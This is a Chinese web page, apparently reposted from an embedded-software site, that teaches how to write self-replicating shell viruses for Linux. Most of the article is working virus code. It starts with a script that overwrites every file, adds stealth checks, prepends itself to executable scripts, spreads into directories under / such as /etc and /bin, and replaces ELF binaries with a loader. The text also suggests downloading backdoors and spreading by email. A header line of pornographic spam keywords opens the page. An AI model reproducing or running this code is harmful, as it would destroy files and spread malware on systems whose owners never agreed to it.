日本黄色一级经典视频|伊人久久精品视频|亚洲黄色色周成人视频九九九|av免费网址黄色小短片|黄色Av无码亚洲成年人|亚洲1区2区3区无码|真人黄片免费观看|无码一级小说欧美日免费三级|日韩中文字幕91在线看|精品久久久无码中文字幕边打电话

當(dāng)前位置:首頁 > 嵌入式 > 嵌入式軟件
[導(dǎo)讀]介紹如何用Shell病毒技術(shù)感染Linux腳本程序

主要的shell病毒技術(shù)
-------------------
當(dāng)然,本文需要你至少了解linux shell編程的基礎(chǔ)知識和一星點的病毒知識.
ok!我們進(jìn)入正題!
我們來看一個最原始的shell病毒,代碼最能說明問題:
---------------------------------------------------------
#shellvirus I
for file in *
do
 cp $0 $file
done
---------------------------------------------------------
簡單吧?遍歷當(dāng)前文件系統(tǒng)的所有文件,然后覆蓋所有文件.但是,我們知道linux是多用戶的操作系統(tǒng),它的文件是具有
保護(hù)模式的,所以以上的腳本有可能會報出一大堆的錯誤,所以它很快就會被管理員發(fā)現(xiàn)并制止它的傳染.所以我們可以
為該腳本做個判斷,這樣隱蔽性就大大增強了:
---------------------------------------------------------
#shellvirus II
for file in *
do
if test -f $file
then
if test -x $file
then
if test -w $file
then
if grep -s echo $file >.mmm
then
cp $0 $file
fi; fi; fi; fi; fi
done
rm .mmm -f
---------------------------------------------------------
ok.我們改進(jìn)了一下,加了若干的判斷,判斷文件是否存在,是否文件可執(zhí)行,是否我們有權(quán)限寫,再判斷它是否是腳本程序
如果是就cp $0 $file,所以這段代碼是感然該系統(tǒng)所有的腳本程序的,危害性還是比較大的.if grep -s echo $file>/.mmm
這句也可以這樣寫:if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判斷file是否為shell
腳本程序.
但是,腳本病毒一旦在感染完畢之后就什么也不做了,它沒有象二進(jìn)制病毒那樣的潛伏的危害性,而且以上的腳本只是簡
單的覆蓋宿主而已,所以我這里利用了一下傳統(tǒng)的二進(jìn)制病毒的感染機制,效果也不錯,看看下面代碼:
---------------------------------------------------------
#infection
head -n 24 $0 > .test<-取自身保存到.test
for file in *<-遍歷文件系統(tǒng)
do
 if test -f $file<-判斷是否為文件
 then
if test -x $file<-判斷文件是否可執(zhí)行
then
if test -w $file<-判斷文件是否可寫
then
if grep -s echo $file >.mmm<-判斷是否為腳本程序
then
head -n 1 $file >.mm<-提取要感染的腳本程序的第一行
if grep -s infection .mm >.mmm<-判斷該文件是否已經(jīng)被感染
then
rm -f .mm<-已經(jīng)被感染,則跳過
else<-還未被感染
cat $file > .SAVEE<-很熟悉吧?借用了傳統(tǒng)的二進(jìn)制文件的感染機制
cat .test > $file
cat .SAVEE >> $file
 fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f
--------------------------------------------------------
程序的注解足以說明了,其實增加了潛伏的危害性,但還是特容易被發(fā)現(xiàn),沒辦法的事情,shell腳本一般都是明文的,呵呵.不過
危害性已經(jīng)相當(dāng)大了.這段程序用了一個感染標(biāo)志:infection來判斷是否已經(jīng)被感染,著在程序中可以反應(yīng)出來.
ok,為了使上面的代碼不容易被發(fā)現(xiàn),我必須優(yōu)化它,最先考慮的肯定是精練代碼:
--------------------------------------------------------
#infection
for file in * ; do
 if test -f $file && test -x $file && test -w $file ; then
if grep -s echo $file > /dev/nul ; then
head -n 1 $file >.mm
if grep -s infection .mm > /dev/nul ; then
rm .mm -f ; else
cat $file > .SAVEE
head -n 13 $0 > $file
cat .SAVEE >> $file
fi; fi; fi
done
rm .SAVEE .mm -f
--------------------------------------------------------
現(xiàn)在只有兩個臨時文件的產(chǎn)生了,代碼也被精簡到了13行.當(dāng)然可以完全用;來把代碼甚至寫到1-2行,但這里我只是說明問題,就
不寫出來了.
好,我們看看,shell病毒還能做哪些有用的事情,有可能我們想感染別的目錄的文件,比如根目錄或者是/etc,/bin等等,因為大多
數(shù)有用的系統(tǒng)配置腳本都存放在那些目錄下,只要對上述代碼稍作改動就可以實現(xiàn)了
--------------------------------------------------------
#infection
xtemp=$pwd<-保存當(dāng)前路徑
head -n 22 $0 > /.test
for dir in /* ; do<-遍歷/目錄
if test -d $dir ; then<-如果是目錄就cd該目錄
 cd $dir
 for file in * ; do<-遍歷該目錄文件
if test -f $file && test -x $file && test -w $file ; then<-確定文件是否可執(zhí)行,可寫
if grep -s echo $file > /dev/nul ; then<-確定是否為腳本程序
head -n 1 $file > .mm
if grep -s infection .mm > /dev/nul ; then<-確定是否已經(jīng)被感染
rm .mm -f ; else
cat $file > /.SAVEE<-和前面的感染機制一樣感染未被感染的腳本程序
cat /.test > $file
cat /.SAVEE >> $file
fi; fi; fi
 done
 cd ..
fi
done
cd $xtemp<-返回原目錄
rm /.test /.SAVEE .mm -f
-------------------------------------------------------------
其實這段代碼只感染了/目錄下的一層目錄.當(dāng)然我們可以使它感染的更深,只是加幾個循環(huán)而已.同樣shell病毒可以做很多事情
如download后門程序,為機器自動開后門,主動去攻擊聯(lián)網(wǎng)的其他機器,取用戶的email來發(fā)送傳染等等.總之它的實現(xiàn)技術(shù)不高深,
但也比較實用,還是值得去說明一下的,呵呵.
同樣,我們也可以感染elf文件,但危害性很小,這里不重點講,給個例程大家理解一下吧
-------------------------------------------------------------
for file in * ; do
 if test -f $file && test -x $file && test -w $file ; then
if file $file | grep -s 'ELF' > /dev/nul ; then
mv $file .$file
head -n 9 $0 > $file
fi; fi
done
.$0

本站聲明: 本文章由作者或相關(guān)機構(gòu)授權(quán)發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點,本站亦不保證或承諾內(nèi)容真實性等。需要轉(zhuǎn)載請聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權(quán)益,請及時聯(lián)系本站刪除。
換一批
延伸閱讀

CPU親和度通過限制進(jìn)程或線程可以運行的CPU核心集合,使得它們只能在指定的CPU核心上執(zhí)行。這可以減少CPU緩存的失效次數(shù),提高緩存命中率,從而提升系統(tǒng)性能。

關(guān)鍵字: Linux 嵌入式

在Linux系統(tǒng)性能優(yōu)化中,內(nèi)存管理與網(wǎng)絡(luò)連接處理是兩大核心領(lǐng)域。vm.swappiness與net.core.somaxconn作為關(guān)鍵內(nèi)核參數(shù),直接影響系統(tǒng)在高負(fù)載場景下的穩(wěn)定性與響應(yīng)速度。本文通過實戰(zhàn)案例解析這兩個...

關(guān)鍵字: Linux 內(nèi)存管理

對于LLM,我使用b谷歌Gemini的免費層,所以唯一的成本是n8n托管。在使用了n8n Cloud的免費積分后,我決定將其托管在Railway上(5美元/月)。然而,由于n8n是開源的,您可以在自己的服務(wù)器上托管它,而...

關(guān)鍵字: 人工智能 n8n Linux

在Linux系統(tǒng)管理中,權(quán)限控制是安全運維的核心。本文通過解析/etc/sudoers文件配置與組策略的深度應(yīng)用,結(jié)合某金融企業(yè)生產(chǎn)環(huán)境案例(成功攔截98.7%的非法提權(quán)嘗試),揭示精細(xì)化權(quán)限管理的關(guān)鍵技術(shù)點,包括命令別...

關(guān)鍵字: Linux 用戶權(quán)限 sudoers文件

Linux內(nèi)核中的信號量(Semaphore)是一種用于資源管理的同步原語,它允許多個進(jìn)程或線程對共享資源進(jìn)行訪問控制。信號量的主要作用是限制對共享資源的并發(fā)訪問數(shù)量,從而防止系統(tǒng)過載和數(shù)據(jù)不一致的問題。

關(guān)鍵字: Linux 嵌入式

在云計算與容器化技術(shù)蓬勃發(fā)展的今天,Linux網(wǎng)絡(luò)命名空間(Network Namespace)已成為構(gòu)建輕量級虛擬網(wǎng)絡(luò)的核心組件。某頭部互聯(lián)網(wǎng)企業(yè)通過命名空間技術(shù)將測試環(huán)境資源消耗降低75%,故障隔離效率提升90%。本...

關(guān)鍵字: Linux 云計算

在Linux內(nèi)核4.18+和主流發(fā)行版(RHEL 8/Ubuntu 20.04+)全面轉(zhuǎn)向nftables的背景下,某電商平臺通過遷移將防火墻規(guī)則處理效率提升40%,延遲降低65%。本文基于真實生產(chǎn)環(huán)境案例,詳解從ipt...

關(guān)鍵字: nftables Linux

在Linux設(shè)備驅(qū)動開發(fā)中,等待隊列(Wait Queue)是實現(xiàn)進(jìn)程睡眠與喚醒的核心機制,它允許進(jìn)程在資源不可用時主動放棄CPU,進(jìn)入可中斷睡眠狀態(tài),待資源就緒后再被喚醒。本文通過C語言模型解析等待隊列的實現(xiàn)原理,結(jié)合...

關(guān)鍵字: 驅(qū)動開發(fā) C語言 Linux

在Unix/Linux進(jìn)程間通信中,管道(pipe)因其簡單高效被廣泛使用,但默認(rèn)的半雙工特性和無同步機制容易導(dǎo)致數(shù)據(jù)競爭。本文通過父子進(jìn)程雙向通信案例,深入分析互斥鎖與狀態(tài)機在管道同步中的應(yīng)用,實現(xiàn)100%可靠的數(shù)據(jù)傳...

關(guān)鍵字: 管道通信 父子進(jìn)程 Linux

RTOS :RTOS的核心優(yōu)勢在于其實時性。它采用搶占式調(diào)度策略,確保高優(yōu)先級任務(wù)能夠立即獲得CPU資源,從而在最短時間內(nèi)完成處理。RTOS的實時性是通過嚴(yán)格的時間管理和任務(wù)調(diào)度算法實現(xiàn)的,能夠滿足對時間敏感性要求極高的...

關(guān)鍵字: Linux RTOS
關(guān)閉